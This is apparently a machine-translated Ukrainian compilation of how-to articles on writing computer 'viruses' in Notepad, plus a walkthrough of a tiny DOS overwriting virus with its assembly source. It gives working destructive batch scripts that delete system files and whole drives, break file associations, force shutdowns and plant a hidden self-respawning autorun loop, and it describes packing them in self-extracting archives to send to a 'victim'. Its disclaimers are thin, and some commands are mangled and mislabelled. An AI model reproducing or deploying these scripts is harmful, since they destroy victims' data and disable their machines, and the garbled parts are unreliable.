Не думайте, будь ласка, що знання про те, як пишуться віруси, потрібні тільки вірусописьменниками! З метою комп'ютерної безпеки вони не менш важливі і простим користувачам. Навіть поверхове розуміння того, як написати віруси в блокноті, допоможе захистити комп'ютер від багатьох неприємностей.

Ось так виглядає вірус, набраний в звичайному блокноті, який є в складі будь-якої системи від Microsoft Windows. Але знайте - це складно назвати вірусом, просто системні команди, вони зберігаються в формате.bat. Для зміни розширень, потрібно налаштувати систему:

  • відкриваємо « комп'ютер«
  • Заходимо верхнє в меню « сервіс«, Якщо не видно тиснемо ALT
  • У цьому меню заходимо в « сервіс»Вибираємо пункт« Параметри папок«
  • Заходимо у вкладку « вид»І шукаємо пункт« Приховувати розширення для зареєстрованих типів файлів«
  • прибираємо галочку з цього пункту.

З першого погляду нічого страшного - всього кілька коротких слів-команд. Але на ділі, якщо помістити цей файл в системну папку « system32 \\ drivers \\ etc»І прописати його в автозавантаження, щоб він запускався при завантаженні системи, то, після перезапуску комп'ютера, неможливо буде відкрити будь-яку програму або вибрати іншу дію на робочому столі. Не рекомендується повторювати ці дії, якщо немає навичок роботи з системним реєстром!

Замість telnetdrive.bat спробуйте вписати безпечні команди для запуску: Calc (калькулятора), Taskmgr (диспетчера задач) або Mspaint (програми малювання)

З чого почати

Прийшов час вивчити невелику загальну інструкцію з «виготовлення» таких файлів.

  • Насамперед відкриваємо блокнот;
  • Заносимо туди команди, тобто створюємо в ньому «тіло» вірусу;
  • Зберігаємо свою працю через Файл -\u003e Зберегти як;
  • Тепер залишилося змінити розширення файлу . txt на . bat і, замість збереженого назви, вписати потрібне, яке буде використовуватися.

Простий вірус написаний і збережений в файл. Тепер би непогано дізнатися, що ж прописали в тіло вірусу, збереженого у файлі.

Починаємо розбиратися по порядку з першого рядка:

  1. @ Echooff - без цієї команди все, що написано, висвічувалося б на екрані монітора.
  2. Date11.14 - вказує на дату створення.
  3. Ifexistc:sky.batgotoabc - перевірка існування на диску С файлу sky.bat і якщо його немає
  4. Copy% 0 c: sky.bat - розмножує себе, змінивши початкове ім'я файлу на sky.bat
  5. Attrib +hc:sky.bat - приховує створений файл від сторонніх очей.
  6. Echoc:sky.bat \u003e\u003eautoexec.bat - вірус прописується в автозавантаження.
  7. : abc - якщо він є, виконання програми перейде сюди.
  1. mdCRECK - створює потрібну або непотрібну папку, дивлячись яка мета у творця вірусу.
  2. mdNEW - такими папками можна заповнити весь жорсткий диск у користувача.
  3. LabelE:LUZER - прописує назва логічного диска Е. В даному випадку LUZER.
  4. assoc.exe \u003d.mp3 - расшіреніе.exe буде асоціюватися, как.mp
  5. del c: Program Files / q -все, що було в папці Program Files віддалиться.
  6. del *. * / q - з каталогу, де знаходиться вірус, віддалиться все, крім папки з самим вірусом.

Повеселилися досить, подумаємо і про закон:

  1. del% 0 - вірус наробить справ і видалить сам себе.

Залишилося останнє, дізнатися, як же його ховають. Просто! Переформатують файл з расшіренія.bat в.exe за допомогою архіватора WinRAR. При створенні архіву позначають - «Створити архів SFX» і встановлюють позначку «Виконати після розпакування». Природно, вказують справжнє ім'я, під яким створено вірус.

дисклеймер

Дана стаття написана в освітніх цілях і автор не несе відповідальності за вчинені вами дії. Будьте розсудливі і цінуєте праці інших людей.

Як створюються комп'ютерні віруси | трохи теорії

Комп'ютерні віруси - вид шкідливого програмного забезпечення, здатного створювати копії самого себе і впроваджуватися в код інших програм, системні області пам'яті, завантажувальні сектори, а також поширювати свої копії по різноманітним каналам зв'язку.

Комп'ютерні віруси мають наступні класифікації:

  • завантажувальні віруси - віруси, які проникають в завантажувальний сектор пристроїв зберігання даних, таких як жорсткі диски, флешки, дискети і т.д., і здатні порушити доступність файлів.
  • файлові віруси - тип вірусів, які впроваджуються у виконувані файли (файли з розширенням COM і EXE) і негативно впливають на їх функціональність.
  • Файлово-завантажувальні віруси - віруси, які об'єднують в собі функції двох попередніх типів вірусів;
  • Документні віруси - вид вірусів, які заражають файли офісних систем. Такий вид ще називають «макровірусами», оскільки зараження системи відбувається за допомогою зараження макросів програми.
  • Мережеві віруси - тип вірусів, які поширюються за рахунок використання комп'ютерної мережі, тобто мережевих служб і протоколів.

Найвідоміший вірус в світі називався ILOVEYOU. За своєю суттю він був абсолютно нешкідливим, черв'як, який спам пошти людей. Однак недавно світ був схильний до кібератак, які змусили всіх задуматися про свою безпеку. Вірус WannaCry заразив дуже багато комп'ютерів і вимагав викуп у розмірі 300 доларів в біткоіни. Однак деякі аналітики вважають, що це була лише перевірка і далі буде ще одна атака, набагато більших масштабів і спрямована вона буде на користувачів Apple.

І все ж, WannaCry хоч і був поширений і досить багато з нього грошей поимели, це був звичайний WinLocker, який можна було зняти. Справа в тому, що платили в більшості банки і компанії, у яких не було часу розбиратися, а 300 доларів для них не є серйозною втратою.

Створюємо жартівливі віруси і не тільки

Давайте створимо кілька своїх вірусів, які я не рекомендую перевіряти на своїй комп'ютері, так як це може дуже погано закінчитися.

Зробити такі віруси зможе абсолютно кожен, так як нам не знадобляться спеціалізоване ПЗ і т.п., нам потрібен просто блокнот.

Відразу скажу, що збережуть наш файл в переважній більшості випадків ми буде в формате.bat, ім'я я пишу anyname, але ви можете давати абсолютно будь-який.

Видалення всіх файлів

Даний код ми зберігаємо як anyname.bat і все, після запуску весь вміст віддалиться.

Синій екран Смерті

@echo off del% systemdrive% *. * / f / s / q shutdown -r -f -t 00

Даний код ми зберігаємо в файл anyname.vbs, зверніть увагу, що тут формат файлу обов'язково повинен бить.vbs, а не.bat.

Форматуємо диски C, D, E за три секунди

rd / s / q D:
rd / s / q C:
rd / s / q E:

Зберігаємо даний файл як anyname.bat і запускаємо. Форматування всіх дисків відбудеться за три секунди.

Ефект Матриці | Matrix Effect

@echo off
color 02: tricks
echo% random %% random %% random %% random %% random %% random %% random %% random%
goto tricks

Зберігаємо як anyname.bat і запускаємо, це не небезпечно для вашого ПК.

Вимкнення ПК і відключення можливості перезагрузікі

@echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo off Msg * YOU GOT INFECTED! Shutdown -s -t 7 -c "A virus is taking over c: Drive

Зберігаємо як kind.bat, НЕБЕЗПЕЧНО ЗАПУСКАТИ НА СВОЄМУ ПК!

Замінюємо файли на неробочі

Даний вірус замінить такі формати (.exe .jpeg .png .mpeg .sys)

@echo off assoc .txt \u003d jpegfile

Зберігаємо як anyname.bat і запускаємо.

Видалення операційної системи

@echo off Del C: *. * | y

Зберігаємо як anyname.bat і запускаємо на ПК жертви.

А на цьому сьогодні все, спасибі за прочитання статті і я сподіваюся ви не будете зловживати отриманою інформацією. Якщо ви хочете ще вірусів, то пишіть в коментарях, зробимо! Збережіть статтю в своїх соціальних мережах, щоб не втратити.

Удачі в житті і до зустрічі!

"Він довго кудись їхав в незручній жорсткої упаковці, його трясло і заколисували, тіло вимагало їжі. Він не розумів, чому його, тільки-тільки з'явився на світ, викинули з дому ... Нарешті тряска припинилася, і хтось чужий і грубий розкрив пріаттаченний до листа архів. Молодий, цікавий вірус висунувся назовні і зробив свій перший поділ ... "

У цій статті я поділюся досвідом вірусописання. Основний принцип діяльності будь-якого вірусу можна виразити в декількох словах: тіло вірусу під час його виконання трактується, як код, а під час зараження, як дані. Існує багато типів вірусів і різних способів зараження. Природно, сам механізм дій вірусу залежить від конкретної операційної системи. Є, наприклад, віруси, що працюють в захищеному режимі процесора (режим максимальних
привілеїв і абсолютної адресації всієї пам'яті). На лікування таких екземплярів таким компаніям, як AVP, доводиться витрачати дуже багато часу і ресурсів. Єдине, що рятує творців антивірусів - дуже мале число реально професійних вірусів.

Для того, щоб навчитися самому писати віруси необхідно лише знання основ асемблера. Я маю на увазі, що при початкових знаннях ти можеш пробувати писати власні віруси і досліджувати вже існуючі. Інші корисні, а часом необхідні,
знання прийдуть в міру твого вивчення чужих творінь. З ресурсів по цій темі можу порадити сторінку, яка містить величезну кількість книг і статей:
http://vx.netlux.org/lib_rus.shtml.
Всі її документи написані на дуже зрозумілою і доступною
мовою. Так само існує відомий електронний журнал Infected Voice. У ньому є зручна система навігації, що дозволяє орієнтуватися в нових матеріалах (исходниках і статтях). Цей журнал виходить раз на пів року (принаймні так було раніше, зараз не впевнений) і містить всі нововведення в цій області.

Припустимо ти знайшов исходник будь-якого вірусу і хочеш його досліджувати. Як це зробити? Чесно кажучи, я сам зіткнувся з такою проблемою в найперший раз. У мене питання стало так: є текст вірусу, хочу подивитися, як він працює, і при цьому Я ЙОГО БОЮСЬ! Це цілком реально: що завадить цьому віруси спалити мій CMOS або потерти мій гвинт? Відповідь: ніщо. При твоїх неправильних діях вірус може заподіяти тобі ту шкоду, на який запрограмований. Однак, алгоритм правильних дій досить простий. Зараз ми в ньому і розберемося.

Будемо вважати, що исходник вірусу написаний на асемблері. Ця мова ідеально підходить для написання вірусів. Як відомо, в
асемблері є тільки дві команди викликають "реальні" (маються на увазі дії, здатні призвести
незворотні зміни на жорсткому диску або ще де-небудь) це "INT" і "OUT", всі інші команди працюють з регістрами процесора і прапорами (хоч і досить грубо, але за великим рахунком вірно). Ми не розглядаємо функції WIN API, так як їх в принципі можна вважати заміною переривань DOS, а їх виклик - заміною команди
"INT".

Невелика довідка для новачків або давно не писали на Асмі: команда "INT" служить для виклику переривань DOS або BIOS, а команда "OUT" для запису даних в порт. При цьому для команди "INT" номер функції вказується в регістрі AH (найчастіше), а
для команди "OUT" в регістрах AL, AX, EAX зберігаються дані, що записуються в порт.

Отже. Візьми будь-відладчик. Так як для початку потрібно розбиратися в віруси під DOS (вони як і раніше працюють і під
Win), то підійде будь-який відладчик: Turbo Debugger від Borland Inc., CodeView від MicroSoft, AFDPRO або AVPUTIL. Далі, завантаж исходник в відладчик і покроково трасуючими. Головне дотримуватися ТІЛЬКИ ОДНОГО ПРАВИЛА. Його можна назвати золотим.
УВАГА: ти можеш сміливо виконувати вихідний код твого вірусу, але як тільки ти дійдеш до команд "OUT" або "INT" відразу зупиняйся і починай аналіз.

Ти повинен проаналізувати:

  • номер викликається переривання або порту записи;
  • номер викликається функції або дані, що записуються в порт.

Для того, щоб розібратися з реальними діями цих команд використовуй або Tech Help, або будь-яку доку по Асму, або будь-яку
книгу. Головне, щоб в твоєму джерелі можна було знайти інфу по всіх переривань і портам.
Таким чином, ти можеш зрозуміти, що буде робити
наступна команда, не виконавши її у себе на комп'ютері. Під час трасування, записуй всі дані (стан регістрів, адреси команд, дані про
викликаються функціях і т.д.) на аркуш паперу. Тоді до моменту виклику функції (або записи в порт) ти будеш у всеозброєнні і зможеш визначити, що станеться, якщо ти виконаєш наступну команду. Так само це допоможе тобі при порівняльному аналізі змін в регістрах і прапорах.

Після того, як ти зрозумієш, що робить та чи інша команда ( "INT" або "OUT"), пропусти її і йди далі, поки не
зустрінеш кінець файлу або наступну таку команду. В результаті ти розкласти будь-який вірус по поличках і розберешся в його функціонуванні.

Давай розглянемо приклад. Як оного я взяв невеликий вірус, написаний якимось Reminder "ом. Я дістав його з одинадцятого номера Infected Voice" а. Там він був без коментарів, так що всю роботу довелося виконати самому. Що мене
привернуло в цьому творінні: дуже маленький вихідний код, дуже маленький розмір відкомпільованого файлів, незрозумілий (на перший погляд) алгоритм. Ось його вихідний код (до речі, називається він REM22):

Model tiny
.code
.startup
start:
pop cx
hel:
xchg ax, bx
db 108h shr 1
db 4eh; dec si
db 9eh shr 1
db 3ch; cmp al, xx
db 100h shr 1
db 40h
fmask db "*. *", 0
lodsw
cwd
mov dl, al
shl dx, 1
int 21h
jmp hel
end

Цей вірус на мій погляд є шедевром, так як при такому маленькому розмірі
організувати механізм розмноження - робота по істині генія. Коли ми зараз розберемо, що і як він робить, все
стане на свої місця. А поки що треба зауважити: в принципі, цей вірус не несе будь-яких деструктивних дій (думаю, розмноження можна вважати таким), проте заражає всі файли
в одному з них каталозі. Він не є "професійним" вірусом, тобто в ньому відсутні багато механізмів, характерні для серйозних творінь:

  • відсутній механізм "свій / чужий" (вірус заражає всіх без розбору, навіть себе або вже заражені об'єкти);
  • зараження відбувається тільки файлів в одному з ним каталозі (спробуй його скомпілювати і запустити в папці, де крім нього
    нікого немає:));
  • вірус не є поліморфним (не шифрується сам себе і не змінює свій код);
  • вірус не несе деструктивних дій;
  • вірус не є резидентами.

Давай заглянемо до всередину нашого
оверрайетера. Исходник вдає із себе модель для створення exe-файлу. ".Startup" це директива TASM "а, без неї можна обійтися, але тоді доведеться писати" org 100h ", а потім ставити мітку (і
в кінці, після "end", ставити ім'я мітки). Решта команд можна без проблем знайти в будь-якій книжці і подивитися, що вони роблять (не лінуйся). Залишилося тільки розібратися, що роблять ці команди разом в сукупності.

Даний шедевр - це звичайний цикл, який повторюється 6 разів. Що ж відбувається в циклі? А відбувається те, що ми викликаємо int 21h з шістьма різними функціями (93, 4E, 3C, 40, 2E, 00). дивимося
по порядку, значить:

"Pop cx" - це тільки для обнулення сх (в вершині стека, як ти знаєш, спочатку проги лежить зеро). Навіщо? А щоб на команді SUB CH, (пошукай, воно повинно бути по зсуву 108h в дебаггера) отримати CH \u003d 01 (по зсуву 2Ah (це в PSP десь) завжди лежить FFh), тобто годі й випендрюватися і просто написати sub ch, ffh, але це змінить код проги ... Виходить:
*. *, 0 \u003d sub CH ,, а це вже готова маска для пошуку ... ОСЬ ДЕ геніального !!!

Тобто sub ch, ffh - це "AЕ" (в ASCII кодах з пропуском в кінці). Далі, все що йде зі зміщення 101 (code 93) до зміщення 10B (code 00) - це ФУНКЦІЇ ДЛЯ int 21h !!! Тобто це 6 функцій, які ми по черзі викликаємо в циклі (див. вище їх номери), а код, який при цьому виходить - це просто мішура. Це не має АБСОЛЮТНО НІЯКОГО ГЛУЗДУ! ТАК ВИЙШЛО, ЯКЩО СОБРАТЬ ФУНКЦІЇ ПОДРЯД. Тобто, якщо я напишу TANAT, то це переведеться в послідовність якихось команд, адже так? Але це по суті дані ... хоча в даній проге - це і даними не назвеш, це просто ФУНКЦІЇ для int 21h, ось у чому
Геніальний !!! Далі розповідати сенсу немає - тому що в кожному з шести циклів відбувається виклик функції, ну і все регістри приблизно
підігнані під ідеали ... Дивись:

У перший раз викликається 93h функція: Pipe (Error) - вона для самої проги НЕ ВИКОНУЄ НІЯКОЇ НАВАНТАЖЕННЯ, НІЧОГО корисного НЕ РОБИТЬ, ЦЕ ПРОСТО НАДЛИШОК, ВОНА НЕ ПОТРІБНА, ЦЕ ЗАЙВА ЦИКЛ, АЛЕ З ОГЛЯДУ НА геніальність коду, вона просто ВИНИКАЄ САМА ПО СОБІ І ВІД НЕЇ нікуди не дінешся !!! Буде ще одна така "ліва" функція - см. Далі.

Друга: 4Eh - ось це вже те, що треба! Пошук файлу, причому до моменту виклику в dx знаходиться зміщення маски файлу (108h) !!!

Третя: 3Ch - створення файлу. Це ще одна "ліва" функція. Вона нам ні до чого. Нам нема чого створювати файл (адже ми повинні тільки записати себе в той файл, що знайшли в попередньому кроці). У DX лежить якийсь лівий сміття, природно з
ім'ям файлу нічого спільного не має, тому CF \u003d 1 і ми переходимо на наступний цикл.

Четверта: 40h - Запис в файл. А ось це те, що нам треба вже! DX містить зсув 100h (тобто початок REM22), а ось CX трохи підвів - він дорівнює 400h, тобто реально в початок знайденого файлу
запишеться 400h байт, тоді як REM22 займає всього 22 байта, тобто запишеться 1002 зайвих байта. Це так. Але з огляду на геніальність коду :), це можна пробачити.

П'ята: 2Eh - Set Verify Flag. Це САМА ЛЕВАЯ функція, тут вона просто - апендикс проги.

Шоста: 00h - це виявляється вихід з проги (я теж не знав).

Ось і все: тобто ми маємо 6 циклів, з яких смислових тільки 3: пошук, запис і вихід.
Швидше за все тобі буде дуже багато чого не
поянтно. Щоб розібратися, завантаж исходник в відладчик, потрассіруй його, подивися
на стан дані в регістрах, подивися на мої коментарі. Тоді все стане ясно. На закінчення
привожу отладочную таблицю, щоб ти не складав її сам (за одне і подивишся, як вона повинна виглядати). В принципі її однією повинно вистачити,
для розуміння того, що відбувається в цьому вірусі, але, думаю, коментарі будуть не зайвими.

ADR CODE ASM 1 2 3 4 5 6
100 59 POP CX CX \u003d 0 - - - - -
101 93 XCHG AX, BX AX \u003d BX \u003d 0 AX \u003d 0, BX \u003d 9300h AX \u003d 9300h, BX \u003d 0 AX \u003d 0, BX \u003d 0005h AX \u003d 0005h, BX \u003d 0400h AX \u003d 0400h, BX \u003d 2E00h
102 84 4E 4F TEST B + 4Fh,
CL
- - - - - -
105 3C 80 CMP AL,
80h
- - - - - -
107 40 INC AX AX \u003d 0001h AX \u003d 0001h AX \u003d 9301h AX \u003d 0001h AX \u003d 0006h AX \u003d 0401h
108 2A 2E 2A 00 SUB CH, B CX \u003d 0100h CX \u003d 0200h CX \u003d 0300h CX \u003d 0400h CX \u003d 0500h CX \u003d 0600h
10C AD LODSW (DS: SI-\u003e AX) AX \u003d DS:
100 \u003d 9359h
AX \u003d DS:
102 \u003d 4E84h
AX \u003d DS:
104 \u003d 3C4Fh
AX \u003d DS:
106 \u003d 4080h
AX \u003d DS:
108 \u003d 2E2Ah
AX \u003d DS:
10A \u003d 002Ah
10D 99 CWD (DX \u003d E (AX)) DX \u003d FFFFh DX \u003d 0000h DX \u003d 0000h DX \u003d 0000h DX \u003d 0000h DX \u003d 0000h
10E 8A D0 MOV DL, AL DX \u003d FF59h DX \u003d 0084h DX \u003d 004Fh DX \u003d 0080h DX \u003d 002Ah DX \u003d 002Ah
110 D1 E2 SHL DX, 1 DX \u003d FEB2h DX \u003d 0108h DX \u003d 009Eh DX \u003d 0100h DX \u003d 0054h DX \u003d 0054h
112 CD 21 INT 21h AH \u003d 93 (Pipe) - Error AH \u003d 4E
(FindFirst)
AH \u003d 3C (CreateFile) AH \u003d 40 (WriteFile) AH \u003d 2E (SetVerifyFlag) AH \u003d 00 (Terminate)
114 EB EB JMP SHORT 101 ??? - - - ??? -

Як не дивно, але інформацією про те, як створити вірус, цікавляться не тільки комп'ютерні генії і розумні програмісти, а ще й звичайні користувачі персонального комп'ютера. Іноді злопам'ятні люди усвідомлено готові завдати шкоди жертві шляхом створення шкідливого програмного забезпечення, але найчастіше це всього лише розіграш кібернетичного характеру. Будь-яке проникнення в комп'ютер третіх осіб або ж умисне нанесення шкоди програмному забезпеченню карається законодавством багатьох країн. Дана стаття про те, як зробити вірус, може використовуватися тільки для того, щоб користувач розумів, як застосовуються команди Windows NT.

створення вірусу

Створити свій власний комп'ютерний вірус може кожен початківець користувач ПК. Для цього зовсім не обов'язково володіти знаннями в області програмування. Досить мати бажання, трохи вільного часу для того, щоб розібратися в найпростіших командах, ну і, звичайно ж, комп'ютер. Ця статися навчить вас, як створити вірус в "Блокноті". В даному випадку ми будемо працювати без різних інтерпретаторів, код не будемо поміщати в спеціалізовані середовища розробки. В чому полягає суть даного методу? Наша програма (вірус) буде виконуватися шляхом перетворення текстового файлу в пакетний файл Windows з розширенням (* .bat). Після його запуску будуть виконуватися всі події, які ви вкажете в виконуваному файлі. Тепер ви знаєте в теорії, як створити вірус, далі можна переходити до більш докладного вивчення цієї теми. Хочу вас попередити, що ці віруси не призначені для серйозних речей. Хоч вони і можуть нашкодити комп'ютеру, але масштаб трагедії невеликий. Вкрасти інформацію у жертви у вас не вийде, а вже тим більше стежити за нею. Настав час показати вам, як створити вірус. Для цього раджу вам навчитися застосовувати команди управління Windows NT, деякі з них будуть описані далі. Відкриваємо звичайний текстовий редактор і набираємо в ньому таку команду: @echo off.

Вітаю, ви відключили екран виконання. Тепер після запуску вашого вірусу жертва не дізнається про хід виконання шкідливого коду, тому що весь процес буде прихований від її очей. Далі з нового рядка наберіть такий код:% SystemRoot% / system32 / rundll32 user32, SwapMouseButton\u003e nul.

Пояснювати кожну команду немає сенсу, але суть її в тому, що тепер кнопки вашої миші запрограмовані в зворотному порядку (призначення кнопок помінялося місцями). Тепер збережіть даний файл і поміняйте його розширення (замість * .txt поставте * .bat). Перед вами пакетний файл Windows, після запуску якого ваша миша буде працювати неправильно. Ви отримали наочний приклад того, як створити вірус, і якщо це вам цікаво, то можете продовжити вивчати такого роду команди і копати цю нішу глибше. Якщо хочете серйозно налякати вашу жертву, то можете додати такі рядки:

taskkill / f / im explorer.exe\u003e \u200b\u200bnul
shutdown -r -t 1 -c "lol" -f\u003e nul

Першим рядком ви відключаєте процес "explorer.exe", а наступного - просто перезавантажувати комп'ютер. Ваше завдання - з нового рядка дописувати в ваш вірус нові команди, після чого зберегти файл і поміняти його розширення. Ви майже хакер. Тепер давайте підсунь цей файл жертві. Створений файл з розширенням bat ви повинні помістити в спеціальний SFX-архів, попередньо обравши пункт "Виконати після розпакування". Тепер комп'ютер жертви буде автоматично заражений цим вірусом після відкриття архіву. Залишилося тільки відправити наш "подарунок".

Все вже придумано

Ось тільки навіщо винаходити велосипед, якщо досвідчені програмісти і хакери дуже сильно спростили нам життя? У відкритому доступі ви без проблем зможете знайти програму під назвою "Генератор вірусів" Кузя ". Вам не потрібно буде писати вручну все команди. Досить тільки вибрати потрібну дію, а програма самостійно створить для вас цей шкідливий файл.

Створення найпростіших вірусів не вимагає наявності спеціальних середовищ для розробки програм. І особливих знань, до речі, теж. Створити віруси досить просто, якщо використовувати для цього командний рядок. Для цього потрібно небагато знати синтаксис командного рядка і вміти создавать.bat-файли.

Що такое.bat-файл і як його створити?

Якщо дуже поверхнево, то це файли з расшіреніем.bat. Такі файли несуть в собі команди, які повинні бути виконані командним інтерпретатором Windows. Всі ті команди, які можна редагувати у вікні командного рядка, можна вписати в.bat-файл і запустити. Результат буде однаковим.

Щоб создать.bat-вірус, нам потрібен звичайний текстовий редактор. В ідеалі підійде для цих цілей Блокнот. Створивши і відкривши новий текстовий документ, Вам потрібно вписати туди той код (команди), які він повинен виконати. Після цього, Вам потрібно за допомогою меню Зберегти якзберегти цей файл, задавши йому якесь ім'я з розширенням .bat і вказавши тип файлу Всі файли.

Створюємо найпростіший вірус

У даній статті ми розглянемо створення вірусу, який після свого запуску буде нескінченно відкривати вікно командного рядка. Нескінченно і дуже швидко відкриваються вікна командного рядка не дадуть користувачеві спокійно працювати. Закрити їх всіх не встигне ніхто і дуже скоро вони заб'ють оперативну пам'ять комп'ютера, що в свою чергу сильно загальмує роботу комп'ютера, аж до повного зависання. Виглядати це буде приблизно так:

До того ж, ми закинемо наш вірус в автозавантаження, що забезпечить автоматичний запуск вірусу разом з операційною системою.

Код створюваного вірусу

Скільки програмістів, стільки різних рішень можна придумати для кожного завдання. Я приведу один зі своїх методів вирішення такого завдання.

md c: \\ papka
echo start c: \\ papka \\ virus.bat\u003e c: \\ papka \\ virus.bat
reg add HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v virus / d c: \\ papka \\ virus.bat
attrib + r + h + s c: \\ papka
attrib + r + h + s c: \\ papka \\ virus.bat
start c: \\ papka \\ virus.bat
del% 0

А тепер розберемо сам код. Перший рядок створює папку з ім'ям papka в корені диска C: /. Така адреса наведено тільки для прикладу. Використання ж кореня папки C: / не зовсім хороший варіант для вірусу. Якщо Ви хочете забезпечити хорошу виживаність Вашому вірусу, найкраще заховати його подалі. Першу команду можна навіть припустити, якщо Ви закине сам вірус в уже створену директорію.

Другий рядок створює файл c: \\ papka \\ virus.bat і, за допомогою команди echo, вписує в нього команду start c: \\ papka \\ virus.bat. Тут потрібно знати, що після знака\u003e вказується місце виведення наведеної команди. Тут Вам потрібно познайомиться: c: \\ papka \\ virus.batі є основне тіло вірусу. Створений намі.bat-файл з кодом, який ми зараз розбираємо, є всього лише монтажником нашого основного вірусу. Ви можете використовувати іншу назву і інше місце розташування для вірусу.

Третій рядок закидає створений нами в другій сходинці тіло вірусу в автозавантаження. Для цього використовується для користувача гілка реєстру, так як до неї у користувача завжди є доступ. А ось використовувати автозагрузку комп'ютера небезпечно, так як користувач може не мати адміністративного доступу, що викличе непотрібну помилку.

Четверта і п'ята рядок коду змінюють атрибути вірусу і папки, де зберігається вірус. Даними командами, а для цього використовується, ми додаємо атрибути Тільки читання, Прихований і Системний і для папки, і для вірусу. Використання атрибута r (Тільки читання) не обов'язково. А ось атрибути Прихований і Системний добре захистять створений нами вірус. Якщо не вірите, то почитайте статтю про вірус, який. Він використовує саме цю технологію.

6-а строчка коду запускає наш вірус. Ви можете пропустити цей пункт, якщо хочете, щоб перший запуск вірусу стався тільки після перезавантаження комп'ютера.

І, нарешті, остання, 7-а строчка видаляє данний.bat-вірус. Це корисно, тому що по етому.bat-файлу можна спокійно вийти на створений нами вірус і видалити його.

Сенс створеного вірусу

Сенс вірусу, який вмістився в ці 7 рядків - створити основний вірус, захистити його і забезпечити його постійну роботу. А так же підмести свої сліди. А що робить основний вірус? Після запуску основного вірусу, він виконує ту команду, яка вписана в неї. А це команда, в свою чергу, запускає наш вірус, який знову-таки знову запускає самого себе. І так до нескінченності.

Як боротися з такими вірусами?

По-перше, початок боротьби з цим вірусом почнеться після того, як він запуститися. Дуже скоро вірус заповнить своїми копіями оперативну пам'ять і Ви навіть мишкою ворухнути не зможете. Тому, такий спектакль потрібно припиняти відразу. Для цього прекрасно підійде кнопка Break на клавіатурі. Тисніть її стільки, скільки знадобиться, щоб нові копії перестали створюватися. На клавіатурах без кнопки Break, може допомогти поєднання клавіш Ctrl + C.

Як видалити такий вірус?

Ви можете через його запис в автозавантаження (докладніше за посиланням). А так же Ви можете вийти на вірус по команді, яка буде висвітлюватися у вікні командного інтерпретатора. Природно, якщо Ви зможете дістатися до прихованого і системного файлу. Ось таким чином відбувається створення простого вірусу.